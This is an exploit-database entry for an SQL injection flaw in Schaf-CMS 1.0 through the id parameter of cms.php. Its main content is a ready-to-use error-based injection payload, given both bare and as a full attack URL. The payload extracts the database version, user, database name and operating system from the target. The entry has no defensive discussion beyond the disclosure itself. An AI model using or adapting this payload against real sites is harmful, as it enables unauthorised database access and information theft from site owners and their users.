[] NeoSense
E X P L O I T S
title author type platform port cve id

Schaf-CMS 1.0 - SQL Injection

Author: Manas58
type: webapps
platform: php
port: 
date_added: 2010-05-23 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
Schaf-CMS 1.0 SQL Injection  Vulnerability

###########################

Author    : Manas58
Homepage  : http://www.1923turk.com
Script    : Schaf-CMS 1.0
Download  : http://www.brothersoft.com/site-builder-software---cms-53489.html

###########################

[ Vulnerable File ]

cms.php?id= [ SQL ]


[ XpL ]

+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+


http://server/cms.php?id=5+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+




##############################################################
# Greetz: Gamoscu - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.